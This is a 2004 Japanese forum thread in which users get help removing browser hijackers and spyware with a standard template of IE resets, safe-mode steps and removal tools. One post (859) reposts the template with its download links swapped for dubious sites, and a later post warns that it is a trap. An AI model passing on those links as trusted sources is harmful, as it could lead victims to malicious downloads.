多分それだと思います!!
どうしたらいいんですか?WINDOWSをインストールしなおせばいいのですか?

症状:WINDOWSインストーラがインターネット開くたび勝手に作動してしまいます。
「Miclosoft Office XP Personal」というタイトルで。

どなたか解決策を知ってる方お願いいたします。

805 :763:04/05/24 00:16 ID:UYUJ1eg7
>>787
教えていただいた通りスタートアップ全部外してインストール→スキャンして
怪しげなファイルを消したのですがそれでも症状は変わらずでした…
ここまでくるとリカバリ以外、他に方法は無いのでしょうか…

806 :ひよこ名無しさん:04/05/24 00:25 ID:???
8)Me/XPの場合「システムの復元」で直近の正常な状態に復帰させる、という手もアリ。
 [スタート]→[すべてのプログラム]→[アクセサリ]→[システム ツール]
  →[システムの復元]
 復元フォルダに悪プログラムが残ったままになるのでアンチウィールスのスキャン
 で警告が出たり、うっかり再度復元して緊急事態に逆戻りしたりwに注意。また復元
 ポイントは日付の古いほうから順に消えていきます。正常なポイントがどれだったか
 紙にメモ取るなりして管理しときましょう。

>>804-805↑やってみた?

807 :763:04/05/24 00:31 ID:UYUJ1eg7
>>806
すいません、当方98seです_| ̄|○

808 :ひよこ名無しさん:04/05/24 00:33 ID:???
CWshredder、spybot、ad-aware、hijackthis
をダウンロード、インストール

 ツールをダウンできない場合
 http://higaitaisaku.web.infoseek.co.jp/removehacdef.html

セーフモードで実行、使い方は
http://higaitaisaku.web.infoseek.co.jp/menu5.html
ここみれば分かるだろう

>>473もやっておく

ウィルススキャンもやっておく

809 ::04/05/24 00:33 ID:c+UojKVd
いきなり割り込んで申し訳ないのですが・・・スレッドの立て方がわからなくて。誰か、エロサイトをロックする方法を教えてください。


810 :ひよこ名無しさん:04/05/24 00:37 ID:???
>>809
http://oshiete1.goo.ne.jp/kotaeru.php3?q=839250
ここいってみな

「アダルトサイト 閲覧 禁止」とかで、いろいろ検索してみな


811 :639 ◆7nVWiBpJOc :04/05/24 00:51 ID:jpCzdTkY
>>720
つД`)・゚・。・゚゚・*:.。
714は僕ではないです。


さて、報告です。
直りました。

参考>>337>>709>>730

皆様のご好意に深く感謝いたします。
2ちゃんって悪い人ばかりだと思っててごめん (´・ω・`)

812 :ひよこ名無しさん:04/05/24 01:00 ID:???
>>811
おつかれさん

813 :ひよこ名無しさん:04/05/24 01:11 ID:???
  [二二]__  流石だよな俺ら
  (,,´ー`)  (゚∀゚,,)
_(__つ/ ̄ ̄/  i)
  \./__/ ̄ ̄ ̄

814 :763:04/05/24 01:17 ID:UYUJ1eg7
結局、諦めてコマンドプロントからシステムの復元させました。
ヒントを下さった>>764さん>>769さん>>780さん>>787さん>>795さん>>806さん
ありがとうございました_| ̄|○


815 :639 ◆7nVWiBpJOc :04/05/24 01:28 ID:jpCzdTkY
三日間で睡眠時間一桁というような悲惨なことが繰り返されないように、
ホームが ://jksearch.biz/redir.php になる場合の症例を載せておきます。
尚、OSは98、IEは6.0の場合です。

 症状
@. web設定のリセットを行っても ://jksearch.biz/redir.php に戻ってしまう。
A. 通常モードの起動時にフォルダを開こうとするとフリーズする。

 行うべき処置
@ 先ずDonutPなりなんなり、タブブラウザを使う。
  IE起動する毎に毒された場所に行くのを避ける為。
  参考 タブブラウザ推奨委員会 http://tabbrowser.ktplan.jp/
A IEオプション → web設定のリセット、一時ファイルの削除、クッキーの削除、履歴の削除。
B ウイルススキャン
  当方はウイルスバスターオンラインスキャンを使用 http://www.trendmicro.co.jp/hcall/index.asp
  出来れば市販の物が良いと。
〜セーフモードで再起動〜
C ブラウザジャッカーCoolWebSearch駆除ツール CoolWebShredder の使用。
  http://higaitaisaku.web.infoseek.co.jp/removecws.html
D 定番スパイウェア除去ソフトの使用。
  Ad-aware 6.0 Build181 http://www.dream-seed.com/server/spy.html
  Spybot Search&Destroy http://www.dream-seed.com/pukiwiki/index.php?Windows%2FSpybot%A4%CE%BB%C8%A4%A4%CA%FD
E Highjackthis の使用。
  http://higaitaisaku.web.infoseek.co.jp/HijackThis.exe
〜通常モードで再起動〜
F Highjackthis の結果を貼って偉い方の意見を聞く。
〜セーフモードで再起動〜
G 「jksearch」を検索。 「\SYSTEM32.DLL」 が出てくれば削除。
H regeditで「jksearch」を検索。出てきたものを全てhttp://www.google.com/intl/ja/等(個人のお好きにどうぞ)に変更。

これで症状は改善される筈。がんがれ。

816 :ひよこ名無しさん:04/05/24 01:32 ID:???
(*^ー゚)b グッジョブ!!

817 :338:04/05/24 01:35 ID:7jK+wz63
スパイウェアに感染して、ウィルス検索のやつをインストールしたり、
スパイウェアを除去してきたんですが、
それらが原因なのか音声が出なくなってしまいました・・・。

どうしたらいいですか?

818 :ひよこ名無しさん:04/05/24 01:37 ID:???
>>817
買い換えろ、デブ。

819 :ひよこ名無しさん:04/05/24 01:38 ID:???
冷たいなぁ。

820 :ひよこ名無しさん:04/05/24 01:39 ID:???
>>639
偉い。お疲れさん。

821 :ひよこ名無しさん:04/05/24 01:40 ID:???
>>338
音声の前に症状は治ったのかい?

822 :ひよこ名無しさん:04/05/24 01:41 ID:???
なるほど。

823 :ひよこ名無しさん:04/05/24 01:45 ID:???
      / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
      |   マスター、今夜も賑わってるね♪
       レヽ___________________
   ∧_∧        ∧_∧    / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   (  ・∀) / ̄ヽ  (´∀`  ) < ゆっくりしてって下さいモナ
   (   `つ 日 凸 ( つ つヽ  \________________
   (_ ⌒./   凵ヽ | | | |ヽ.凸|   |
   「  (_/Y     ヽ _(__) | |\|   |
  ┗┳━| ̄ ̄ ̄ ̄ ̄|    ..   \|. │  |
    ┻\|        .|        \.|   │

824 :ひよこ名無しさん:04/05/24 01:59 ID:???
何故かホーム ページが変な海外サイトになってしまいました
これといって心当たりもなく、いくら直してもその海外サイトにつながってしまいます。
システム復元をしても直らず途方にくれております、
よければアドバイスください_| ̄|◯

825 :581 ◆NP67jHR9o6 :04/05/24 02:00 ID:???
駄目だぁ〜!
IEをやめて、sleipnirってやつに変えて、ウィルスも完全に駆除したのに、
やたら動作が重い!ものっそい重い!
インターネットの動作はすこぶる速いんだけど、マイフォルダとかのやつ
が滅茶苦茶重い・・・・誰か助けて下さい・・・・・

826 :ひよこ名無しさん:04/05/24 02:02 ID:???
>>825
トロイです。

827 :ひよこ名無しさん:04/05/24 02:05 ID:???
>>824
http://higaitaisaku.web.infoseek.co.jp/index.html
ここ読む

828 :ひよこ名無しさん:04/05/24 02:06 ID:???
>>825も↑やってみ

829 :ひよこ名無しさん:04/05/24 02:08 ID:???

なぁに3日もありゃ読み終えるだろ。

830 :ひよこ名無しさん:04/05/24 02:09 ID:???
>>815も読んでおく

831 :ひよこ名無しさん:04/05/24 02:18 ID:???
群青さん後は頼みましたよ。

832 :338:04/05/24 02:25 ID:7jK+wz63
>>821さん
緊急事態に逆戻りしてしまい、恐くなったので復元取りやめました。
復元した時もインストーラは勝手に出現していました・・・。
どうしたらいいのでしょうか?

症状:WINDOWSインストーラがインターネット開くたび勝手に作動してしまいます。
「Miclosoft Office XP Personal」というタイトルで。
症状:スパイウェアに感染して、ウィルス検索のやつをインストールしたり、
スパイウェアを除去してきたんですが、
それらが原因なのか音声が出なくなってしまいました・・・。

どなたか解決策を知ってる方お願いいたします。


833 :ひよこ名無しさん:04/05/24 02:28 ID:???
>>338
>>808をやってみな


834 :ひよこ名無しさん:04/05/24 02:30 ID:???
音声は後回しにしとけ

835 :ひよこ名無しさん:04/05/24 02:32 ID:???


   ∧∧
   /⌒ヽ)  
  i三 ∪
 ○三 |
  (/~∪
  三三
 三三
三三三     テンプレじゃ治らないんですね。

836 :ひよこ名無しさん:04/05/24 02:33 ID:???
>>835
治るかもしれないし治らないかもしれない。
実行しなければいつまでたっても治らない。

837 :824:04/05/24 02:37 ID:E/uttq3C
おかげで無事直りました!
アドバイス有り難う御座いました。

838 :ひよこ名無しさん:04/05/24 02:39 ID:???


839 :ひよこ名無しさん:04/05/24 02:41 ID:???
こういうトラブルを有料で解決するのを生業にしたらどうだろう。


840 :ひよこ名無しさん:04/05/24 02:48 ID:???
すでにあるが何所も厳しい、商売にはならん。

841 :ひよこ名無しさん:04/05/24 02:55 ID:???
同業者が多すぎるよね。

842 :338:04/05/24 03:00 ID:7jK+wz63
あと時々Download the best Emotionsという広告も出ます。
なにかのヒントになればいいんですが・・・。

843 :ひよこ名無しさん:04/05/24 03:04 ID:???
>>842
>>46

844 :ひよこ名無しさん:04/05/24 03:11 ID:fFtfOnwh
スパイウェア除去ソフトのCWShredderとやらで
何回掃除してもCWS afifiliate: Madfinderに
「REMOVED」がつきます。OSはMe。

現在PC立ち上げが異常に不安定。アップデートしても不安定。
むかついたのでキーボード殴ったらボタンが飛び出た。
何とかしたいのですがどうすればいいでしょおか。

845 :ひよこ名無しさん:04/05/24 03:15 ID:???
《応急処置》

1) 閉じない窓を強制的に閉じる→alt+F4
2) IEのホーム、検索ページを標準に戻す→ツール→インターネットオプション→
  プログラム→WEB設定のリセット(作業中頻繁に実行してください。無限ループ防止)
3)IEの履歴削除→ツール→インターネットオプション→全般→インターネット
  一時ファイル→クッキーの削除+ファイルの削除
4) 削除したいファイルがあるが「アクセスできません。使用中です」とかいわれて
  削除できない→セーフモード(F8を連打)でOSを起動→削除→OS再起動
5) 勝手に追加されたアプリをアンインストする→スタート→コントロールパネル→
  アプリケーションの追加と削除(JWordはここでアンインストのこと)→OS再起動
6) 定番駆除ツールで駆除  a)→b)→c)の順に実行してください。
 a)CoolWebShredder 他のツールで駆除しにくいブラウザジャッカーCoolWebSearch
  専用の駆除ツールです。まずこれから実行。
  http://higaitaisaku.web.infoseek.co.jp/removecws.html#jyokyo 
  または本家 ttp://www.spywareinfo.com/~merijn/downloads.html→OS再起動
 b) Ad-Aware  http://www.dream-seed.com/server/spy.html (更新頻度高)
 c) Spybot-S&D http://www.dream-seed.com/server/spybot.html (強力だが更新頻度低)
8)Me/XPの場合「システムの復元」で直近の正常な状態に復帰させる、という手もアリ。
 [スタート]→[すべてのプログラム]→[アクセサリ]→[システム ツール]
  →[システムの復元]

846 :844:04/05/24 03:20 ID:fFtfOnwh
>>845
100回ぐらい試したので、それはもういいです。

847 :845:04/05/24 03:23 ID:???
 。・゚・(ノД`)・゚・。ウエエェェン

848 :ひよこ名無しさん:04/05/24 03:23 ID:???
100回試したって言うが、セーフモードでCWshredder、spybot、ad-aware、hijackthisを実行したのか?
それと>>473>>815とか試したのか?

849 :845:04/05/24 03:28 ID:???
>>848

(・∀・)つI

850 :ひよこ名無しさん:04/05/24 03:59 ID:RgZZrkmd
このスレの>>90>>272のように
CoolWebSearch系スパイウェアに感染した方への質問なのですが、

トップページがabout:blank(通常の空白ページではなく
serch for..などと書かれた広告ページが表示される)に書き換えられた場合、

1.HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\AboutURLsキー内の
"blank"の値は、通常の"res://mshtml.dll/blank.htm"以外の値になっていますか?

2.Resource Hackerで"%SYSTEM%\MSHTML.DLL"内の
"23\BLANK.HTM"を表示させた場合、下記以外のソースが記載されていますか?
─────────────────────────────────
<HTML>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=shift_jis">
</HTML>
─────────────────────────────────

できれば使用OSやSP適用の有無、ブラウザのバージョンも記載して頂けるとありがたいです。

因みに当方はWin2000SP4+IE6SP1の環境で、ActiveX等を無効にしているためか
今のところ感染はありません。
もっとも、エロサイトを見まくっているといつ感染するやら……。


・Resource Hacker
ttp://www.users.on.net/johnson/resourcehacker/
の「Japanese」からDL

・%SYSTEM%が表すパス
「9X系」 C:\Windows\System
「NT/2000」 C:\WinNT\System32
「XP」 C:\Windows\System32

851 :ひよこ名無しさん:04/05/24 05:11 ID:dqHhJlSb
プロバメールで、家って突き止められる?
それか自宅番号とか

852 :ひよこ名無しさん:04/05/24 05:16 ID:???
>>851←典型的な馬鹿

853 :ひよこ名無しさん:04/05/24 05:18 ID:???
>>852
その理由を10文字で述べよ

854 :ひよこ名無しさん:04/05/24 05:21 ID:???
>>852
(´く_` )コタエレナイノカ

855 :ひよこ名無しさん:04/05/24 05:22 ID:???
>>852-854 = >>851


856 :ひよこ名無しさん:04/05/24 05:38 ID:???
/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| はい、ありがとうございます!
| 2ちゃんねるサポートセンターです。
\______  _______
         ∨
   (⌒)  ∧_∧ D
    ( ) ( ・∀・)○    ___
パイプ→┗⊂   )D……/◎\
=============================

857 :ひよこ名無しさん:04/05/24 06:05 ID:???
IEで英語圏のサイトを見回っていた後から

IEが勝手に立ち上がりhttp://www9.killxppopups.com/49810284/index.html
サイトにつながる症状になっています
(特にエロは無くアットランダムにいろんな英語圏のサイトにつながる)

spybotかけると「CnsMin」という項目がひっかかります

メモリー上にあるので再起動後spybotを起動させれば解決できます

とでるのですが、それの繰り返しで消せません
システムの復元でもダメでした

858 :ひよこ名無しさん:04/05/24 06:07 ID:6G+npBjd
凄いな、オメデト。

859 :ひよこ名無しさん:04/05/24 06:13 ID:???
>>857

《応急処置》

1) 閉じない窓を強制的に閉じる→alt+F4
2) IEのホーム、検索ページを標準に戻す→ツール→インターネットオプション→
  プログラム→WEB設定のリセット(作業中頻繁に実行してください。無限ループ防止)
3)IEの履歴削除→ツール→インターネットオプション→全般→インターネット
  一時ファイル→クッキーの削除+ファイルの削除
4) 削除したいファイルがあるが「アクセスできません。使用中です」とかいわれて
  削除できない→セーフモード(F8を連打)でOSを起動→削除→OS再起動
5) 勝手に追加されたアプリをアンインストする→スタート→コントロールパネル→
  アプリケーションの追加と削除(JWordはここでアンインストのこと)→OS再起動
6) 定番駆除ツールで駆除  a)→b)→c)の順に実行してください。
 a)CoolWebShredder 他のツールで駆除しにくいブラウザジャッカーCoolWebSearch
  専用の駆除ツールです。まずこれから実行。
   http://users.hoops.ne.jp/ee94012/hayanet21st/index-1.htm
  または本家 ttp://www.spywareinfo.com/~merijn/downloads.html→OS再起動
 b) Ad-Aware  http://www.oct-net.ne.jp/~missile/altoegoh/r.htm (更新頻度高)
 c) Spybot-S&D http://perso.wanadoo.es/lsmagsupermix1/ (強力だが更新頻度低)
8)Me/XPの場合「システムの復元」で直近の正常な状態に復帰させる、という手もアリ。
 [スタート]→[すべてのプログラム]→[アクセサリ]→[システム ツール]
  →[システムの復元]


860 :ひよこ名無しさん:04/05/24 06:20 ID:UBkMHd44
CoolWebShreddeとSpybotを使ってスパイウェアを除去できたみたいなんですが
最初は普通にアクセスができるのですが10分くらいしたらとつぜんDNSエラー
になってしまいます
たとえばヤフーにアクセスすると

「ページを表示できません
検索中のページは現在、利用できません。Web サイトに技術的な問題が発生しているか、
またはブラウザの設定を調整する必要があります」
となってエラーが出てしまいます

プロパティで見ると
res://C:\SYSEDITED\SYSTEM\SHDOCLC.DLL/dnserror.htm#http://www.yahoo.co.jp/

という所にアクセスしているみたいなんですが解決方法わかる方お願いします。
OSは98SEです。

861 :ひよこ名無しさん:04/05/24 06:22 ID:???
>>860
>>859


862 :----->>859は地雷!!------:04/05/24 06:36 ID:???

即死注意!!

NotFound ばかりだけど。

863 :ひよこ名無しさん:04/05/24 06:40 ID:???
(((((((( ;゚Д゚)))))))ガクガクブルブルガタガタブルガタガクガクガクガクガク

864 :ひよこ名無しさん:04/05/24 07:16 ID:???
       _____
   / ̄.....//.... θ ̄>
  ∠|::::::::::::::U:: τ ::::::<
⊂二|::::::::::::::::::::::::::θ_>
    ̄∠/ ̄ ̄ 七輪でも買ってくるか・・・

865 :740:04/05/24 09:05 ID:zOsY0tq4
半日レスがついてなかったようなのでもう一度お願いします。
もし、この情報のほかにこれも書いてくれと言う情報があれば教えてください。

OS: Microsoft Windows XP    Internet Explorer Version: 6.0.2800.1106.xpsp2.030422-1633
Googleで検索しても目的のページに飛べないのですがどうしたらよろしいですか?
トップページで文字を入れて検索ボタンを押す→検索結果一覧が表示される→ひとつ選択する→トップページへ逆戻り(上に表示されるアドレスは変わっている。)→更新してもそのまま
といった感じです。
Spybot-S&Dや、インターネットオプションなどまとめページに書いてあることを試してみましたが改善されません
解決方法を教えてください。

866 :ひよこ名無しさん:04/05/24 09:08 ID:???
Internet Explorer の異常かも

867 :ひよこ名無しさん:04/05/24 09:51 ID:???
>>865
スパイウェアの典型的な症状ですね。
徹底的にスパイウェアを駆除してください。(いろんなソフトを使って)

868 :ひよこ名無しさん:04/05/24 10:19 ID:???
>>865
プロキシ使ってます?

869 :740:04/05/24 10:36 ID:7hak1lO+
>>867
分かりました。現在、AD-AwareとSpybot-S&Dをしようしていますが、他にどのようなソフトを使えばよろしいでしょうか?
Googleが使えないのでできればアドレスを張っていただけるとありがたいのですが、とりあえずヤフーで検索してきます。
>>868
いえ、まったく使っていません。

レスどうもありがとうございます。

870 :ひよこ名無しさん:04/05/24 10:51 ID:???
>>869
>>845を実行

871 :740:04/05/24 11:29 ID:7hak1lO+
>>870
既に実行済みです。変化はありません。他の方法をどうかよろしくお願いします。

872 :ひよこ名無しさん:04/05/24 11:33 ID:???
>>871
ウィルススキャンはやったの?

873 :ひよこ名無しさん:04/05/24 11:34 ID:???
>>869
なんでGoogleだけ使えないんだ?
Googleツールバーとか入れた経験は?

874 :740:04/05/24 11:41 ID:7hak1lO+
>>872
一応ノートンとトレンドマイクロのオンラインスキャンをやってみましたが、何も見つかりませんでした。

>>873
なんのことだか分からないので、そんなことはしていないと思います。

レスどうもありがとうございます。

875 :ひよこ名無しさん:04/05/24 11:43 ID:???
>>874
Google
http://216.239.39.104/

876 :ひよこ名無しさん:04/05/24 11:46 ID:???
>>874
ちゃんとスパイウェア駆除ツールのアップデートしてる?
あと、Spybotはバージョン何使ってる?

877 :740:04/05/24 11:52 ID:7hak1lO+
>>875
どうしても「Google そのサイトはサーバー内に見つかりません」というページか元のトップページに行ってしまいます。

>>876
spybot 1.2です。なんか新しいバージョンを見つけたのでダウンロードしてみます。

878 :ひよこ名無しさん:04/05/24 11:55 ID:???
ダンナがエロサイトでいろんなもんもらって。消えないファイルが16個。
緊急対処の4)でも出来ないの・・・。もうヘトヘト・・・
WINme、IE6、TROJ_HARNIG.BとBKDR_JEEMP.C・・・・。
NIFTY出張サポート頼んじゃった・・・。でも4〜5日後・・・。
もうダメポ・・・。2人の男児が暴れてる・・・。でも気になる消えないファイル。
ちょっと愚痴らせてもらいました。蟻が豚。逝ってキマツ・・・。


4) 削除したいファイルがあるが「アクセスできません。使用中です」とかいわれて
  削除できない→セーフモード(F8を連打)でOSを起動→削除→OS再起動


879 :ひよこ名無しさん:04/05/24 11:56 ID:???
>>877
プロバイダどこよ

880 :ひよこ名無しさん:04/05/24 11:59 ID:???
>>878
Reboot File Deleter 112
こういうソフトもあるのだよ  強制ゴミ箱
これでだめなら コマンドプロンプトからポイ

881 :ひよこ名無しさん:04/05/24 12:02 ID:???
>>878
アンチウィルスソフトくらい入れとけ

882 :ひよこ名無しさん:04/05/24 12:05 ID:???
お前のだんなのエロさ加減ときたら・・・
おにあいだな

883 :740:04/05/24 12:20 ID:7hak1lO+
>>879
golです。
ttp://www.gol.com/

884 :ひよこ名無しさん:04/05/24 12:29 ID:???
>>883
このアドレスを教えて
「Google そのサイトはサーバー内に見つかりません」のページに行って
右クリック>プロパティ>アドレスをコピー

885 :878:04/05/24 12:34 ID:SXemK31J
880さんありがとう。そのファイル消せました。が、今度はオンラインスキャン
に拒否されて、オンラインでスキャンできません。orz
もうダメポ。オレニオニアイノエロダンナorz

886 :ひよこ名無しさん:04/05/24 12:38 ID:???
>>885
タスクマネージャーのプロセスで動いているものの名前がわかるから
邪魔くさいがネットで検索していく
ウイルスらしきやつがあるならタスクマネージャーからそれを終了させる
それからスキャン

887 :ひよこ名無しさん:04/05/24 12:55 ID:???
>>885
良かったじゃん、お似合いの相手が見つかって

888 :740:04/05/24 13:06 ID:7hak1lO+
>>884
アドレスは一応検索した結果のページになっているのですが。
http://www4.plala.or.jp/hiro_k/index01.html
エラーのページのコピペはこんな感じです。
Google
Error


Not Found
The requested URL /hiro_k/index01.html was not found on this server.

実験で検索して出てきた1番上のページです。

プロトコル: HyperText 転送プロトコル (HTTP)
種類: 使用不可
接続: 暗号化なし
以下すべて「使用不可」です。

889 :ひよこ名無しさん:04/05/24 13:16 ID:???
>>888
右クリック>プロパティ>アドレスをコピー

890 :740:04/05/24 13:22 ID:7hak1lO+
>>889
どこで右クリックですか?
ページが表示されているところで右クリックしたら

全般
404 Not Found
プロトコル:   HyperText 転送プロトコル (HTTP)
種類:      使用不可
接続:      暗号化なし
アドレス:    http://www4.plala.or.jp/hiro_k/index01.html
(URL)
サイズ:     使用不可
作成日:     使用不可
更新日:     使用不可
という感じになっています。
他の方法があるのですか?

891 :ひよこ名無しさん:04/05/24 13:28 ID:???
>>890
インターネットオプション>ファイルの削除はやったかな

892 :740:04/05/24 13:35 ID:7hak1lO+
>>891
はい。3度ほど。変化無しです。他に方法はないものなのでしょうか?

893 :ひよこ名無しさん:04/05/24 13:40 ID:???
>>740
テンプレ試したっていうけど
セーフモードでCWshredder、spybot、ad-aware、hijackthisを実行した?
それと
>>473>>815とか試した?

894 :ひよこ名無しさん:04/05/24 13:47 ID:???
PC起動時と約10分ごとにブラウザ開きやがるけど、対処しなくても
問題ないですか?

895 :740:04/05/24 13:47 ID:7hak1lO+
>>893
いえ、セーフモードをいまいち理解していなくて現在試行錯誤中です。
今から
>>815にチャレンジしてみます。

896 :ひよこ名無しさん:04/05/24 13:48 ID:???
質問の前にテンプレ試せ

897 :740:04/05/24 13:57 ID:0NioJlPb
セーフモードで再起動しようとしたところ
<Windows root>\system32\ntoskrnl.exe.
が壊れているか存在しないため起動できませんといわれました。
これはどうしろという意味ですか?

898 :ひよこ名無しさん:04/05/24 14:04 ID:???
>>897
http://oshiete1.goo.ne.jp/kotaeru.php3?q=841764
ここみる

899 :ひよこ名無しさん:04/05/24 14:26 ID:3wHV3tPP
パソコン画面の下のほうの、音量とかが入っている場所(ツールバー?)に、海外のアダルトサイトの「SexCAMS.jp」っていうのがいつのまにか入っていて、消しても再起動したらまたもとの場所に残っているんです。
どうやったら消滅させれるんでしょうか?パソコンは98です。お願いします。

900 :ひよこ名無しさん:04/05/24 14:31 ID:???
>>899
テンプレの処理したのか?

901 :899:04/05/24 14:36 ID:3wHV3tPP
>>900   どういう意味でしょうか?インターネットオプションで削除できるものは削除しました 

902 :ひよこ名無しさん:04/05/24 14:38 ID:???
>>1読めよ

903 :天麩羅屋:04/05/24 14:54 ID:???
テンプレといえば、最近次スレたてるたびに避難所が活用されてるがw
テンプレ案作ってみたから、早めに次スレ用意してみてはどうかな?

マイナーチェンジだけだが、看板では「質問のしかた」をトップに戻した。
(これを後にするとID出さないetcが増える、という意見があったので)

追加訂正とかあれば歓迎。あと新スレ立つまで気が付いた人にテンプレ
案のレス番号を定期貼りしいてもらうといい鴨。

904 :天麩羅屋:04/05/24 14:55 ID:???
エロサイトに限らずWEBを見て回ってたらブラウザ乗っ取られて大変なことに…
いったいどうしたらいいの? って人のためのスレッドです。

▼━質問のしかた ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 ・ E-mail欄(省略可) には何も記入しないこと。(ID出す→偽者対策・質問者の区別)
 ・ 2回目以降の書込は、名前欄に最初に質問した際の「発言番号」を入力すること。
 ・ 他のスレから誘導された場合は、その旨書く。(マルチポストとの区別)
 ・ OSの種類(必須)、ブラウザ、セキュ関係ソフトの有無、やってみたことを明記。

1)このスレのテンプレは★まとめサイト http://haiiro.info/my/text/template.html
  が見やすいです。(セキュリティ関係の情報サイト「スターマジック」の「はいいろ」
  さんのご好意で作成されています。感謝)

 2)まず>「まとめサイト」の★応急処置できるとこまでやってみてください。Me/XPの
   人は★応急処置「システムの復元」を試してください。これで8割は解決するはず。
   な〜んにもしないで質問するとネタ回答食う可能性大w

 3)迷惑ソフトはまず「プログラム(アプリケーション)の追加と削除」からアンインスト
   できないか確認。googleで「迷惑なヤシの名 + uninstall または uninstaller」で
   公式アンインストーラがヒットすることもあります。最後にゴミをHijackthisで処理

 4)2ch他スレ、その他質問サイトとの★マルチポスト(同時に質問)は禁止です。
   回答者に誘導されたか、または質問取り下げた後で移動してください。

 5)ハイジャッカーの99%はIE以外では作動しません。IEの部品を利用しないブラウザ
   Opera http://www.jp.opera.com/ やFirefox http://jt.mozilla.gr.jp/products/firefox/
  を利用するとトラブルを防げるし、IEがハイジャックされたときの非常口になります。

 6)Hijackthisのログいきなり貼るのは禁止。指示があってから貼ってください。

905 :天麩羅屋:04/05/24 14:56 ID:???
過去ログ
part24 http://pc5.2ch.net/test/read.cgi/pcqa/1084800180/ 前スレ
part23 http://pc5.2ch.net/test/read.cgi/pcqa/1083768109/
part22 http://pc5.2ch.net/test/read.cgi/pcqa/1083241874/
part21 http://pc5.2ch.net/test/read.cgi/pcqa/1082454987/
part20 http://pc5.2ch.net/test/read.cgi/pcqa/1081541559/
Part19 http://pc5.2ch.net/test/read.cgi/pcqa/1079883028/
Part18 http://pc2.2ch.net/test/read.cgi/pcqa/1077184761/
Part17 http://pc2.2ch.net/test/read.cgi/pcqa/1074003703/
Part16 http://pc5.2ch.net/pcqa/kako/1070/10709/1070987138.html
Part15 http://pc5.2ch.net/pcqa/kako/1067/10676/1067657959.html
Part14 http://pc5.2ch.net/pcqa/kako/1063/10634/1063426852.html
Part13 http://pc5.2ch.net/pcqa/kako/1057/10575/1057575418.html
Part12 http://pc5.2ch.net/pcqa/kako/1052/10529/1052909722.html
Part11 http://pc5.2ch.net/pcqa/kako/1047/10473/1047359426.html
Part10 http://pc5.2ch.net/pcqa/kako/1043/10439/1043963296.html
Part9  http://pc5.2ch.net/pcqa/kako/1041/10415/1041587359.html
Part8  http://pc.2ch.net/pcqa/kako/1038/10380/1038097140.html
Part7  http://pc.2ch.net/pcqa/kako/1035/10351/1035125416.html
Part6  http://pc.2ch.net/pcqa/kako/1031/10313/1031391849.html
Part5  http://pc.2ch.net/pcqa/kako/1027/10273/1027339934.html
Part4  http://pc.2ch.net/pcqa/kako/1022/10228/1022827947.html
Part3  http://pc.2ch.net/pcqa/kako/1019/10191/1019182804.html
Part2  http://pc.2ch.net/pcqa/kako/1016/10168/1016896969.html
Part1  http://pc.2ch.net/pcqa/kako/988/988993220.html

906 :天麩羅屋:04/05/24 14:56 ID:???
《応急処置》
WEB見ててブラウザが変になったらとりあえず以下を実行。ブラクラ、ジョークソフト、
ブラウザジャッカー、スパイウェアなどの迷惑ソフトの8割はこれで撃退できますよん。

1) 閉じない窓を強制的に閉じる→alt+F4
2) IEのホーム、検索ページを標準に戻す→ツール→インターネットオプション→
  プログラム→WEB設定のリセット(作業中頻繁に実行してください。無限ループ防止)
3)IEの履歴削除→ツール→インターネットオプション→全般→インターネット
  一時ファイル→クッキーの削除+ファイルの削除
4) 削除したいファイルがあるが「アクセスできません。使用中です」とかいわれて
  削除できない→セーフモード(F8を連打)でOSを起動→削除→OS再起動
5) 勝手に追加されたアプリをアンインストする→スタート→コントロールパネル→
  アプリケーションの追加と削除→OS再起動
6)Me/XPの場合「システムの復元」を試してください。正常な状態に復帰できるかも。
 [スタート]→[すべてのプログラム]→[アクセサリ]→[システム ツール]
  →[システムの復元]
 復元フォルダに悪プログラムが残ったままになるのでアンチウィールスのスキャン
 で警告が出たり、うっかり再度復元して緊急事態に逆戻りしたりに注意。また復元
 ポイントは日付の古いほうから順に消えていきます。正常なポイントがどれだったか
 紙にメモ取るなりして管理しときましょう。
7) 定番駆除ツールで駆除  a)→b)→c)の順に実行してください。
 a)CoolWebShredder 他のツールで駆除しにくいブラウザジャッカーCoolWebSearch
  専用の駆除ツールです。まずこれから実行。
  http://higaitaisaku.web.infoseek.co.jp/removecws.html#jyokyo 
  または本家 http://www.spywareinfo.com/~merijn/downloads.html
 b) Ad-Aware http://www.lavasoftusa.com/ (更新頻度高)
 c) Spybot-S&D http://www.safer-networking.org/ (最新版1.3)
8)「助けて」状態が一段落したらWindows Updateでセキュ穴を埋めておきましょう。
  http://v4.windowsupdate.microsoft.com/ja/default.asp

907 :天麩羅屋:04/05/24 14:57 ID:???
《ブラウザハイジャッカーと戦うときの必須ツール》
レジストリのスキャンと修復ツール Hijackthis
 http://higaitaisaku.web.infoseek.co.jp/HijackThis.exe 
日本語解説 http://higaitaisaku.web.infoseek.co.jp/hijackthis.html (詳しい)
入門チュートリアル http://haiiro.info/my/text/template.html#5 (簡易版)

《アンチスパイソフト》
■CWShredder CoolWebSearch専用駆除ソフト 更新:高
  本家 ttp://www.spywareinfo.com/~merijn/downloads.html
■Ad-aware 6.1 スキャン、駆除 非常駐(有料版は常駐監視機能あり)
  本家 ttp://www.lavasoftusa.com/ 更新:高 
  オリジナルの使用法 http://higaitaisaku.web.infoseek.co.jp/adaware.html
  日本語化使用法 http://www.dream-seed.com/server/spy.html 
■Spybot Search&Destroy 1.3 常駐機能あり・スキャン、削除、予防 更新:低
  本家 ttp://www.safer-networking.org/ 更新:低 日本語対応済み
  1.3新機能対応使用法 http://higaitaisaku.web.infoseek.co.jp/spybot2.html
 -------------以上3大定番は必ずインストールしておきましょう---------

■SpyywareBlaster 2.6.1 予防 ☆更新頻度:中
■SpywareGuard 2.2.0 常駐・予防 ☆更新頻度:低
■MRU-Blaster 1.5 各種履歴キャッシュ・クッキー削除。常駐 頻度:低
 以上3種類本家 ttp://www.javacoolsoftware.com/index.html
■各種フリーウェア日本語化パッチ配布所(Ad-aware 6.0 Build181 日本語化ツール
 SpywareBlaster 日本語化、SpywareGuard 日本語ヘルプ など)
